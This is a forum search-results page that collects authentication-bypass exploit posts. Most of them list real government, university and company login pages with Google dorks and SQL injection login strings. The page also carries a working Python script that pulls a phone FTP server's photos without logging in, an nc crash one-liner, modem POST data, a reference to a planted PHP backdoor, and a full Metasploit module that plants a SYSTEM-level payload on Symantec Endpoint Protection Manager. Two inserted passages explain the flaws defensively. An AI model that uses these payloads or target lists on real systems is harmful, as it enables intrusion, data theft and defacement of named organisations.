Search in the discussion forums

Showing results for the tag 'authentication'.



21 results found

  1. [+] Exploit Title: Designed & Developed by NIC,Bhubaneswar Authentication Bypass Vulnerability
     [+] Date: 18/10/2018
     [+] Exploit Author: Rednofozi
     [+] Tested on: Windows 10, Parrot OS
     [+] Vendor Homepage: https://odishavigilance.gov.in
     [+] dork: intext:Designed & Developed by NIC,Bhubaneswar inurl:/login.aspx
     [+] MY page: https://cxsecurity.com/author/Inj3ct0r
     [+] ME: Rednofozi@hotmail.com
     --------------------------------------------------------------
     [+] RHG hackers iran team
     [+] Credits: Rednofozi
     [+] Vulnerability Type: Authentication Bypass Vulnerability
     [+] Severity Level: Med.
     [+] Exploit: info --------------> Authentication Bypass Vulnerability
     ***************************************************************
     [+] Google Search: intext:Designed & Developed by NIC,Bhubaneswar inurl:/login.aspx
     [+] The End, Enjoy Of Hacking ...!
     [+] Exploit Bypass:
     [+] all sites user and pass
     [+] Username: '=''or'
     [+] Password: '=''or'
     [+] http://www.zone-h.org/mirror/id/31722197
     ***************************************************************
     --------------------------------------------------------------
     Authentication Bypass Vulnerability
     http://odishamsme.nic.in/contents/login.aspx
     https://www.sctevtservices.nic.in/PATHASALA/Login.aspx
     https://aiimsbhubaneswar.nic.in/admin/Login.aspx
     http://agrisnetodisha.ori.nic.in/Login.aspx
     https://ntse.scertodisha.nic.in/HHS/login.aspx
     https://ncert-cee.kar.nic.in/login.aspx
     https://od.dmdashboard.nic.in/Login.aspx
     https://odishavigilance.gov.in/vigilance/login.aspx
     ****************************************************************
     Discovered by: Rednofozi | RHG Team hackers
     Thanks To: ReZa CLONER, Moeein Seven.
     Rednofozi.Inj3ct0r
     http://www.exploit4arab.org/exploits/2175
  2. [+] Exploit Title: Website Content Managed by Vigilance Directorate, Odisha Server login Authentication Bypass Vulnerability
     [+] Date: 18/10/2018
     [+] Exploit Author: Rednofozi
     [+] Tested on: Windows 10 and Kali
     [+] Vendor Homepage: https://odishavigilance.gov.in
     [+] ME: Inj3ctor@gmx.us
     --------------------------------------------------------------
     ################################################################
     [+] Exploit:
     [+] all sites user and pass
     [+] Username: '=''or'
     [+] Password: '=''or'
     [+] Admin Url:
     [+] https://odishavigilance.gov.in/Admin/Admin_Login.aspx
     Server login: https://odishavigilance.gov.in/vigilance/login.aspx
     --------------------------------------------------------------
     ****************************************************************
     Discovered by: Rednofozi | RHG Team hackers
     Thanks To: ReZa CLONER, Moeein Seven.
     Rednofozi. Inj3ct0r
     http://www.exploit4arab.org/exploits/2174
  3. [+] Exploit Title: Indian Visa Application GOV.IN *.subdomains Authentication Bypass Vulnerability
     [+] Date: 16/10/2018
     [+] Exploit Author: Rednofozi
     [+] Tested on: Windows 10, Parrot OS
     [+] Vendor Homepage: https://indianvisaonline.gov.in
     [+] dork: 'inurl admin login aspx site gov.in'
     [+] MY page: https://cxsecurity.com/author/Inj3ct0r
     [+] ME: Rednofozi@hotmail.com
     [+] ME: inj3ct0r@tuta.io
     [+] fb.me: https://www.facebook.com/saeid.hat.3
     --------------------------------------------------------------
     [+] RHG hackers iran team
     [+] Credits: Rednofozi Anonysec hackers iran team
     [+] Vulnerability Type: Authentication Bypass Vulnerability
     [+] Severity Level: Med.
     [+] Exploit: info admin log --------------> /admin/login.aspx
     ***************************************************************
     [+] Google Search: 'inurl admin login aspx site gov.in'
     [+] You do not need to scroll to the admin panel. Scratch the panel
     [+] Authentication Bypass Vulnerability --------------> Username & Password Field with: ( '=''or' )
     [+] Put Username & Password Field with: ( '=''or' ) .... now, Start Your Attack ;)
     [+] The End, Enjoy Of Hacking ...!
     [+] http://www.zone-h.org/mirror/id/31722197
     ***************************************************************
     RHG Team hackers
     And test this password: '=' 'or' 'or ' 'x'='x "or "x"="x or 0=0 # 'or 1=1--
     --------------------------------------------------------------
     Authentication Bypass Vulnerability
     https://indianvisaonline.gov.in/admin/Login.jsp -----------------> http://www.zone-h.org/mirror/id/31722197
     https://pgsindia-ncof.gov.in/admin_login.aspx
     http://paradipport.gov.in/Admin/Login.aspx
     http://www.mahahp.gov.in/admin/adminlogin.aspx
     http://www.fci.gov.in/fci/
     http://ncdmaindia.gov.in/AdminSection.aspx
     http://wccb.gov.in/AUTH/AdminPanel/Login.aspx
     http://cwprs.gov.in/Admin/Login.aspx
     https://indianvisaonline.gov.in/admin/Login.jsp
     About 26,500 results
     Enjoy Of Hacking ...!
     ****************************************************************
     Discovered by: Rednofozi | RHG Team hackers
     Thanks To: ReZa CLONER, Moeein Seven.
     Rednofozi.Inj3ct0r
     http://www.exploit4arab.org/exploits/2154
  4. [+] Exploit Title: Pakistan © Copyright by COMSATS IT Center edu.pk *.subdomains Authentication Bypass Vulnerability
     [+] Date: 16/10/2018
     [+] Exploit Author: Rednofozi
     [+] Tested on: Windows 10, Parrot OS
     [+] Vendor Homepage: http://ww3.comsats.edu.pk/itcenter/
     [+] dork: intext:© Copyright by COMSATS IT Center
     [+] MY page: https://cxsecurity.com/author/Inj3ct0r
     [+] ME: Rednofozi@hotmail.com
     [+] ME: inj3ct0r@tuta.io
     [+] fb.me: https://www.facebook.com/saeid.hat.3
     --------------------------------------------------------------
     [+] RHG hackers iran team
     [+] Credits: Rednofozi Anonysec hackers iran team
     [+] Vulnerability Type: Authentication Bypass Vulnerability
     [+] Severity Level: Med.
     [+] Exploit: info admin log --------------> /admin/login.aspx
     ***************************************************************
     [+] Google Search: intext:© Copyright by COMSATS IT Center
     [+] Authentication Bypass Vulnerability --------------> Username & Password Field with: ( '=''or' )
     [+] Put Username & Password Field with: ( '=''or' ) .... now, Start Your Attack ;)
     [+] The End, Enjoy Of Hacking ...!
     [+] http://www.zone-h.org/mirror/id/31722197
     ***************************************************************
     RHG Team hackers
     And test this password: '=' 'or' 'or ' 'x'='x "or "x"="x or 0=0 # 'or 1=1--
     --------------------------------------------------------------
     Authentication Bypass Vulnerability
     http://www.ciit-atd.edu.pk/admin/login.aspx
     http://ww3.comsats.edu.pk
     http://ww3.comssswwwerfv.edu.pk/cps/
     About 202 results for Attek
     ****************************************************************
     Discovered by: Rednofozi | RHG Team hackers
     Thanks To: ReZa CLONER, Moeein Seven.
     Rednofozi.Inj3ct0r
     http://www.exploit4arab.org/exploits/2153
  5. [+] Exploit Title: All Rights Reserved © Universiti Sains Malaysia.2016-2018 Authentication Bypass Vulnerability
     [+] Date: 14/10/2018
     [+] Exploit Author: Rednofozi
     [+] Tested on: Windows 10, Parrot OS
     [+] Vendor Homepage: https://www.usm.my/index.php/en/
     [+] dork: inurl /admin/add_banner.php
     [+] MY page: https://cxsecurity.com/author/Inj3ct0r
     [+] MY page: http://www.exploit4arab.org/author/308/Rednofozi
     [+] ME: Rednfozi@yahoo.com
     [+] ME: Rednofozi@hotmail.com
     [+] ME: inj3ct0r@tuta.io
     [+] fb.me: https://www.facebook.com/saeid.hat.3
     --------------------------------------------------------------
     [+] RGH Digital Security Team
     [+] Credits: Rednofozi
     [+] Vulnerability Type: Authentication Bypass Vulnerability
     [+] Exploit Risk: Medium
     [+] dork: inurl /admin/add_banner.php
     ***************************************************************
     https://www.christinamaryhendrietrust.com/admin/login-failed.php
     http://www.fm105.no/admin/index.php?grid_id=12&id=3&val=edt
     https://www.usm.my/index.php/en/admin-login
     Admin Username: '=''or'
     Admin Password: '=''or'
     --------------------------------------------------------------
     my name is Inj3ct0r Red Hat's hackers
     **********************************************************************
     Discovered by: Rednofozi RGH Digital Security Team
     Thanks To: ReZa CLONER, Moeein Seven.
     Rednofozi
     http://www.exploit4arab.org/exploits/2145
  6. # Exploit Title : Design and Developed By UNASJEE Authentication Bypass Vulnerability
     # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
     # Vendor Homepage : unasjee.net
     # Tested On : Windows and Linux
     # Category : WebApps
     # Exploit Risk : Medium
     # CWE : CWE-592 - [ Authentication Bypass Issues ]
     # CXSecurity : cxsecurity.com/ascii/WLB-2018090208
     # Cyberizm : cyberizm.org/cyberizm-design-by-unasjee-authentication-bypass-vuln.html
     ################################################################################
     # Google Dork :
     intext:''Designed & Developed by: UNASJEE''
     intext:''Developed by: UNASJEE''
     # Admin Control Panel Path : /admincp/index.php
     # Exploit :
     Admin Username : '=''or'
     Admin Password : '=''or'
     # Configuration File Directory Path : /admincp/config.inc
     # Usable Admin Control Panel URL Links =>
     /admincp/mmainsections.php
     /admincp/edititem.php
     /admincp/allproducts2.php?sort=isNew
     /admincp/allproducts2.php?sort=isSug
     /admincp/allproducts.php?sort=order%20by%20ItmName
     /admincp/allproducts.php?sort=order%20by%20ArtNo
     /admincp/allproducts2.php?sort=soption
     /admincp/vinquiries.php
     /admincp/mnews.php
     /admincp/editemail2.php
     /admincp/newsletters.php
     /admincp/links.php
     /admincp/sendnewsletters.php
     /admincp/changepass.php
     /admincp/profile.php
     /admincp/contact2.php
     /admincp/f-view.php
     /admincp/ani.php
     # Directory File Paths =>
     /admincp/sdata/itmimgs/....
     /admincp/sdata/banner/....
     /admincp/sdata/fviewimgs/...
     /admincp/sdata/itmimgs/...
     /admincp/sdata/mainimgs/...
     /admincp/sdata/mimgs/...
     /admincp/sdata/msecimgs/...
     /admincp/sdata/nextimgs/...
     /admincp/sdata/secbanner/...
     /admincp/sdata/secimgs/..
     /admincp/sdata/subimgs/...
     ################################################################################
     # Example Vulnerable Sites =>
     tbshandtools.com/admincp/index.php => [ Proof of Concept ] => archive.is/3fTzD
     chableather.com/admincp/index.php
     fadensports.com/admincp/config.inc
     ################################################################################
     # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
     ################################################################################
  7. # Exploit Title : FlushDesign ZetaFactory Italy SQL Injection and Authentication Bypass Vulnerability
     # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
     # Date : 04/10/2018
     # Vendor Homepage : flushdesign.it ~ zetafactory.com
     # Tested On : Windows and Linux
     # Category : WebApps
     # Google Dork : N/A
     # Exploit Risk : Medium
     # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
     ################################################################################
     # SQL Injection Exploit :
     /news/readnews.php?id=[SQL Injection]
     /productions/productionsview.php?id=[SQL Injection]
     /artists/bands_view.php?id=[SQL Injection]
     # Admin Login Bypass [ Authentication Bypass ] Exploit :
     Admin Panel Login Path : /admin/
     Admin Username : '=''or'
     Admin Password : '=''or'
     # Usable Admin Control Panel URL Links =>
     /admin/home.php
     /admin/banner.php
     /admin/banner/thumbs/.....
     /admin/bio.php
     /admin/news.php
     /admin/bands.php
     /admin/bands/thumbs/....
     /admin/news.php
     /admin/works.php
     /admin/audio.php
     /admin/video.php
     /admin/download.php
     /admin/links.php
     /admin/contacts.php
     /admin/photos.php
     ################################################################################
     # Example Vulnerable Site => dysfunctionproductions.com => [ Proof of Concept ] => archive.is/J86XL
     # SQL Database Error =>
     Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /web/htdocs/www.dysfunctionproductions.com/home/news/readnews.php on line 40
     ################################################################################
     # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
     ################################################################################
  8. ################################################################################
     # Exploit Title : Designed & Hosted By MWC Design England Authentication Bypass Vulnerability
     # Author [ Discovered By ] : AYAR from Cyberizm Digital Security Army
     # Date : 28/09/2018
     # Vendor Homepage : mwcdesign.com
     # Tested On : Windows and Linux
     # Category : WebApps
     # Exploit Risk : Medium
     # CWE : CWE-592 [ Authentication Bypass Issues ]
     ################################################################################
     # Google Dork :
     intext:''Designe & Hosted By. MWC''
     intext:''Designed & Hosted By. MWC''
     intext:''Design By: MWC''
     # Admin Page Login Path => /admincp/
     # Exploit :
     Admin Username : anything' OR 'x'='x
     Admin Password : anything' OR 'x'='x
     # Usable Admin Control Panel URL Links =>
     /admincp/mmainsections.php
     /admincp/clints.php
     /admincp/vinquiries.php
     /admincp/mnews.php
     /admincp/settings.php
     /admincp/changepass.php
     ################################################################################
     # Example Vulnerable Site => losotecintl.com/admincp/
  9. ################################################################################
     # Exploit Title : Azeemi-Tech Technology Company A2zcreatorz Authentication Admin Login Bypass Vulnerability
     # Author [ Discovered By ] : AYAR from Cyberizm Digital Security Army
     # Date : 28/09/2018
     # Vendor Homepage : a2zcreatorz.com ~ azeemi-tech.com
     # Tested On : Windows and Linux
     # Category : WebApps
     # Exploit Risk : Medium
     # CWE : CWE-592 [ Authentication Bypass Issues ]
     ################################################################################
     # Google Dork : intext:''Designed & Developed by: Azeemi''
     # Admin Panel Path => /admincp/
     # Exploit :
     Admin Username : anything' OR 'x'='x
     Admin Password : anything' OR 'x'='x
     # Usable Admin Control Panel URL Links =>
     /admincp/mmainsections.php
     /admincp/vinquiries.php
     /admincp/mnews.php
     /admincp/newsletters.php
     /admincp/sendnewsletters.php
     /admincp/changepass.php
     /admincp/profile.php
     /admincp/contact2.php
     /admincp/f-view.php
     ################################################################################
     # Example Vulnerable Site => mamaxent.com/admincp/index.php
     ################################################################################
     # Discovered By AYAR from Cyberizm.Org Digital Security Team
     ################################################################################
     # Thanks to Cyberizm Team => KingSkrupellos ~ H4CK4L ~ The_ZiziL ~ 1hT1y@R DARKDAYS ~ Leader Shawai ~ OrJiNaL ~ Stallk3r ~ Meczup ~ Dessy and other precious members.
     ################################################################################
  10. ################################################################################
      # Exploit Title : Developed By PC TECH 1996 - 2014 Pakistan Hosting Authentication Bypass Vulnerability
      # Author [ Discovered By ] : AYAR from Cyberizm Digital Security Army
      # Date : 28/09/2018
      # Vendor Homepage : pctech.net.pk
      # Tested On : Windows and Linux
      # Category : WebApps
      # Exploit Risk : Medium
      # CWE : CWE-592 [ Authentication Bypass Issues ]
      ################################################################################
      # Google Dork :
      intext:''Developed By: PC TECH''
      intext:''All Rights Reserved by PC TECH 1996 - 2014. Developed by PC TECH''
      # Exploit :
      Admin Username : anything' OR 'x'='x
      Admin Password : anything' OR 'x'='x
      # Usable Admin Control Panel URL Links =>
      /admincp/main.asp
      /admincp/manageProducts.asp
      /admincp/manageSize.asp
      /admincp/manageColors.asp
      /admincp/vinq.asp
      /admincp/mnews.asp
      /admincp/changePASS.asp
      ################################################################################
      # Example Vulnerable Site => pomee.com/admincp/
      ################################################################################
      # Discovered By AYAR from Cyberizm.Org Digital Security Team
      ################################################################################
      # Thanks to Cyberizm Team => KingSkrupellos ~ H4CK4L ~ The_ZiziL ~ 1hT1y@R DARKDAYS ~ Leader Shawai ~ OrJiNaL ~ Stallk3r ~ Meczup ~ Dessy and other precious members.
      ################################################################################
  11. # # # # # #
      # Exploit Title: Bitcoin,Dogecoin Mining 1.0 - Authentication Bypass
      # Dork: N/A
      # Date: 21.08.2017
      # Vendor Homepage: https://codecanyon.net/user/bousague
      # Software Link: https://codecanyon.net/item/bitcoindogecoin-mining-php-script/20315581
      # Demo: http://test.z-files.site/
      # Version: 1.0
      # Category: Webapps
      # Tested on: WiN7_x64/KaLiLinuX_x64
      # CVE: N/A
      # # # # # #
      # Exploit Author: Ihsan Sencan
      # Author Web: http://ihsan.net
      # Author Social: @ihsansencan
      # # # # # #
      # Description:
      # The vulnerability allows an attacker to access the user panel and administration panel ...
      #
      # Proof of Concept:
      #
      # http://localhost/[PATH]/
      # http://localhost/[PATH]/admincqqq
      #
      # User: anything
      # Pass: 'or 1=1 or ''='
      #
      # Etc...
      # # # # # #
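The strings quoted as "username/password" in posts 1 through 11 above all work the same way: the login form splices the submitted text straight into the SQL `WHERE` clause, so a quote closes the string literal and the remainder rewrites the condition. The following is an added example (not code from any of the posts or from the products they name) that reproduces the effect against an in-memory SQLite table and shows the parameterised query that defeats it. The table layout, the sample account and the function names are assumptions. The `'=''or'` variant from posts 1 to 7 is left out because it depends on MySQL coercing `(username='')=''` to a number; SQLite does not do that, so only the `OR 'x'='x`, `'or 1=1--` and `'or 1=1 or ''='` forms are exercised here.

```python
import sqlite3

# Payloads copied from the posts above (constructed test input, nothing is fetched).
PAYLOADS = [
    "anything' OR 'x'='x",   # posts 8, 9 and 10
    "'or 1=1--",             # password list in post 3
    "'or 1=1 or ''='",       # post 11
]


def make_db():
    """Constructed users table with one account (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cret!')")
    return db


def vulnerable_login(db, user, pw):
    """The pattern the advisories exploit: credentials concatenated into the query."""
    sql = "SELECT id FROM users WHERE username='%s' AND password='%s'" % (user, pw)
    # e.g. user = anything' OR 'x'='x  turns the clause into
    # username='anything' OR 'x'='x' AND password='...' OR 'x'='x'  -> always true
    return db.execute(sql).fetchone() is not None


def safe_login(db, user, pw):
    """Same query with bound parameters: the input stays data, quotes cannot escape."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return db.execute(sql, (user, pw)).fetchone() is not None


def bypass_results():
    """Map each payload to (vulnerable_login result, safe_login result)."""
    db = make_db()
    return {p: (vulnerable_login(db, p, p), safe_login(db, p, p)) for p in PAYLOADS}


if __name__ == "__main__":
    for payload, (vuln, safe) in bypass_results().items():
        print("%-22r concatenated: %-5s parameterised: %s" % (payload, vuln, safe))
```

Each payload logs in through `vulnerable_login` without knowing the password and is rejected by `safe_login`; the only change between the two is that the values travel as bound parameters instead of query text.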
  12. ################################################################################
      # Exploit Title : BulkSMSSystem Bangladesh Education Improper Authentication Backdoor Account Vulnerability
      # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
      # Date : 04/09/2018
      # Tested On : Windows
      # Category : WebApps
      # Exploit Risk : Medium
      # CWE : CWE-287 - [ Improper Authentication ] + CWE-434 [ Unrestricted Upload of File with Dangerous Type ] + CWE-288 - [ Authentication Bypass Using an Alternate Path or Channel ]
      ################################################################################
      # Description for Improper Authentication Vulnerability [ CWE-287 ]
      + When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.
      + If software incorrectly validates user logon information or allows using different techniques of malicious credentials gathering (e.g. brute force, spoofing or changing the URL links without giving a username and password), an attacker can gain certain privileges within the application or disclose sensitive information.
      + If the parameter is equal to "user" the application allows viewing the information; if it is equal to "admin", then it is possible to edit information on the page.
      + If an attacker changes the value of the "group" parameter to "admin", he will be able to modify the page.
      + The attacker might be able to gain unauthorized access to the application and otherwise restricted areas and perform certain actions, e.g. disclose sensitive information, alter the application, or even execute arbitrary code.
      + An attacker can use a variety of vectors to exploit this weakness, including brute force, session fixation, and Man-in-the-Middle (MitM) attacks.
      Reference [ Short Explained by me ] => CWE-287: Improper Authentication [cwe.mitre.org]
      ################################################################################
      # Google Dork : inurl:/admin/myfile/index.php site:bd
      # Exploit : /admin/myfile/index.php
      No Username and Password Required.
      # Usable Admin Control Panel Path URL Links =>
      /admin/index.php
      /admin/myfile/index.php
      /admin/member.php
      /admin/member2.php
      /admin/headline.php
      See your uploaded backdoor .php file here => /pdfview.php?id=[ID-NUMBER]
      ################################################################################
      # Example Site => pbmhhschandpur.edu.bd => [ Proof of Concept ] => archive.is/m9D3m
      ################################################################################
      # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
      ################################################################################
  13. #!/usr/bin/env python
      #==================================================================================
      # Exploit Title: FTP Media Server 3.0 - Authentication Bypass and Denial of Service
      # Date: 2015-05-25
      # Exploit Author: Wh1t3Rh1n0 (Michael Allen)
      # Exploit Author's Homepage: http://www.mikeallen.org
      # Software Link: https://itunes.apple.com/us/app/ftp-media-server-free/id528962302
      # Version: 3.0
      # Tested on: iPhone
      #==================================================================================
      #
      # ------------------
      # Denial of Service:
      # ------------------
      # The FTP server does not properly handle errors raised by invalid
      # FTP commands. The following command, which sends an invalid PORT command to
      # the FTP server, will crash the server once it is received.
      #
      #   echo -en "PORT\r\n" | nc -nv 192.168.2.5 50000
      #
      # ----------------------
      # Authentication Bypass:
      # ----------------------
      # The FTP server does not handle unauthenticated connections or incorrect login
      # credentials properly. A remote user can issue commands to the FTP server
      # without authenticating or after entering incorrect credentials.
      #
      # The following proof-of-concept connects to the given FTP server and
      # downloads all files stored in the "Camera Roll" folder without providing a
      # username or password:

      import sys
      from ftplib import FTP

      # Both host and port are required (the original test of "<= 1" let a
      # missing port fall through to an IndexError on sys.argv[2]).
      if len(sys.argv) < 3:
          print("Usage: ./ftp-nologin.py [host] [port]")
          sys.exit()

      host = sys.argv[1]
      port = int(sys.argv[2])

      files = []
      def append_file(s):
          # LIST output: the file name is the last whitespace-separated field
          files.append(s.split(' ')[-1])

      blocks = []
      def get_blocks(d):
          blocks.append(d)

      ftp = FTP()
      print(ftp.connect(host, port))
      ftp.set_pasv(1)
      # Note: no ftp.login() call. The server accepts commands without USER/PASS.
      ftp.cwd("Camera Roll")
      print(ftp.retrlines('LIST', append_file))
      files.pop(0)

      for filename in files:
          print("Downloading %s..." % filename)
          ftp.retrbinary('RETR /Camera Roll/' + filename, get_blocks)
          f = open(filename, 'wb')
          for block in blocks:
              f.write(block)
          f.close()
          print("[+] File saved to: %s" % filename)
          blocks = []

      ftp.quit()
  14. ############################################
      # Title : ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass
      # Author : Rednofozi
      # category : webapps
      # Tested On : Kali Linux
      # my team: https://anonysec.org
      # me : Rednofozi@yahoo.com
      # Vendor HomePage : https://www.asus.com/Networking/DSLN10_C1_with_5dBi_antenna/
      # Google Dork: inurl:N/A
      # Software version: 1.1.2.2_17
      ############################################
      # search google Dork : N/A
      #################### Proof of Concept #############
      # 1. Description:
      # In ASUS-DSL N10 C1 modem Firmware Version 1.1.2.2_17 there is a login_authorization
      # parameter in the POST data that is used for authorization of access to the admin panel.
      # The data of this parameter is not fully random and you can use old data
      # or data from another device to access the admin panel.
      # 2. Proof of Concept:
      # Browse http://<Your Modem IP>/login.cgi
      # Send this POST data:
      #   group_id=&action_mode=&action_script=&action_wait=5&current_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=YWRtaW46MQ%3D%2D
      # Or this POST data:
      #   group_id=&action_mode=&action_script=&action_wait=5&current_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=FWRtaW46MQ%3D5D
      ######################
      # Discovered by : Rednofozi
      #-- tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT . soldier anonymous. milad shadow
      http://www.exploit4arab.org/exploits/1988
  15. ##
      # This module requires Metasploit: http://metasploit.com/download
      # Current source: https://github.com/rapid7/metasploit-framework
      ##

      require 'msf/core'

      class Metasploit4 < Msf::Exploit::Remote
        Rank = ExcellentRanking

        include Msf::Exploit::FileDropper
        include Msf::Exploit::Remote::HttpClient

        def initialize(info={})
          super(update_info(info,
            'Name'           => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',
            'Description'    => %q{
              This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
              in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities
              include an authentication bypass, a directory traversal and a privilege escalation
              to get privileged code execution.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
              [
                'Markus Wulftange', # discovery
                'bperry'            # metasploit module
              ],
            'References'     =>
              [
                ['CVE', '2015-1486'],
                ['CVE', '2015-1487'],
                ['CVE', '2015-1489'],
                ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
              ],
            'DefaultOptions' => { 'SSL' => true },
            'Platform'       => 'win',
            'Targets'        =>
              [
                [ 'Automatic', { 'Arch' => ARCH_X86, 'Payload' => { 'DisableNops' => true } } ],
              ],
            'Privileged'     => true,
            'DisclosureDate' => 'Jul 31 2015',
            'DefaultTarget'  => 0))

          register_options(
            [
              Opt::RPORT(8443),
              OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
            ], self.class)
        end

        def exploit
          meterp = Rex::Text.rand_text_alpha(10)
          jsp = Rex::Text.rand_text_alpha(10)

          # Authentication bypass: the ResetPassword action hands back an admin session cookie
          print_status("#{peer} - Getting cookie...")
          res = send_request_cgi({
            'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
            'method' => 'POST',
            'vars_post' => {
              'ActionType' => 'ResetPassword',
              'UserID' => 'admin',
              'Domain' => ''
            }
          })

          unless res && res.code == 200
            fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way")
          end

          cookie = res.get_cookies

          if cookie.nil? || cookie.empty?
            fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie")
          end

          # JSP that runs the dropped executable through SemLaunchService (privilege escalation)
          exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
      <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
      }

          # Directory traversal in UploadPackage writes arbitrary files under the Tomcat web root
          print_status("#{peer} - Uploading payload...")
          res = send_request_cgi({
            'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
            'method' => 'POST',
            'vars_get' => {
              'ActionType' => 'BinaryFile',
              'Action' => 'UploadPackage',
              'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe",
              'KnownHosts' => '.'
            },
            'data' => payload.encoded_exe,
            'cookie' => cookie,
            'ctype' => ''
          })

          unless res && res.code == 200
            fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
          end

          register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")

          print_status("#{peer} - Uploading JSP page to execute the payload...")
          res = send_request_cgi({
            'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
            'method' => 'POST',
            'vars_get' => {
              'ActionType' => 'BinaryFile',
              'Action' => 'UploadPackage',
              'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp",
              'KnownHosts' => '.'
            },
            'data' => exec,
            'cookie' => cookie,
            'ctype' => ''
          })

          unless res && res.code == 200
            fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
          end

          register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp")

          print_status("#{peer} - Executing payload. Manual cleanup will be required.")
          send_request_cgi({
            'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
          }, 5)
        end
      end
  16. mohammad_ghazei

    Hacking

    # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
    <!--
    # Exploit Title: Matrimonial Script 2.7 - Admin panel Authentication bypass
    # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
    # Dork: N/A
    # Date: 27.08.2017
    # Vendor Homepage: http://www.scubez.net/
    # Software Link: http://www.mscript.in/
    # Version: 2.7
    # Category: Webapps
    # Tested on: Windows 7 / Mozilla Firefox
    # supporting tools for testing : No-Redirect Add-on in Firefox
    # --!>
    # ========================================================
    #
    # admin panel Authentication bypass
    #
    # Description : Attackers are able to completely compromise the web application built upon
    # Matrimonial Script as they can gain access to the admin panel and manage the website as an admin without
    # prior authentication!
    #
    # Proof of Concept :
    # Step 1: Create a rule in the No-Redirect Add-on: ^http://example.com/path/admin/login.php
    # Step 2: Access http://example.com/path/admin/index.php
    #
    # Risk : Unauthenticated attackers are able to gain full access to the administrator panel
    # and thus have total control over the web application, including content change, adding an admin user, etc.
    #
    # ========================================================
    # [+] Disclaimer
    #
    # Permission is hereby granted for the redistribution of this advisory,
    # provided that it is not altered except by reformatting it, and that due
    # credit is given. Permission is explicitly given for insertion in
    # vulnerability databases and similar, provided that due credit is given to
    # the author. The author is not responsible for any misuse of the information contained
    # herein and prohibits any malicious use of all security related information
    # or exploits by the author or elsewhere.
    # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
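The two-step PoC in the post above only works when the admin page issues a `Location:` redirect for unauthenticated visitors but keeps rendering the protected content after it, so a client that refuses to follow the 302 still receives the page. The following added example (my own model, not Matrimonial Script's code or the poster's) reproduces that handler bug, its one-line fix, and the way to test for it: fetch the page with redirects disabled and look for admin content in the body of the 302. The session dictionary, the page text, the `Admin panel` marker string and `check_live` are assumptions.

```python
import urllib.error
import urllib.request


def admin_index_vulnerable(session):
    """Returns (status, headers, body). Issues a redirect but does not stop."""
    status, headers, body = "200 OK", {}, []
    if not session.get("admin"):
        status = "302 Found"
        headers["Location"] = "/admin/login.php"
        # Missing 'return' here: execution falls through to the page body.
    body.append("<h1>Admin panel</h1>")                 # rendered regardless
    body.append("<a href='adduser.php'>Add admin user</a>")
    return status, headers, "".join(body)


def admin_index_fixed(session):
    """Same page; processing stops as soon as the redirect is issued."""
    if not session.get("admin"):
        return "302 Found", {"Location": "/admin/login.php"}, ""
    return "200 OK", {}, "<h1>Admin panel</h1><a href='adduser.php'>Add admin user</a>"


def fetch(handler, session, follow_redirects):
    """Simulated client: a browser follows the 302, the No-Redirect add-on keeps the body."""
    status, headers, body = handler(session)
    if follow_redirects and status.startswith("302"):
        return headers["Location"], ""      # browser lands on the login page
    return status, body


def leaks_admin_content(handler):
    """Test the handler the way the PoC does: no session, redirects disabled."""
    _, body = fetch(handler, session={}, follow_redirects=False)
    return "Admin panel" in body


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Returning None makes urlopen raise HTTPError carrying the 302 response itself
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def check_live(url, marker="Admin panel", timeout=10):
    """Live version of the same check (assumed marker string; not run offline).
    Returns (status code, True if the un-followed response body contains marker)."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        resp = opener.open(url, timeout=timeout)
        return resp.status, marker in resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, marker in e.read().decode(errors="replace")


if __name__ == "__main__":
    print("vulnerable handler leaks:", leaks_admin_content(admin_index_vulnerable))
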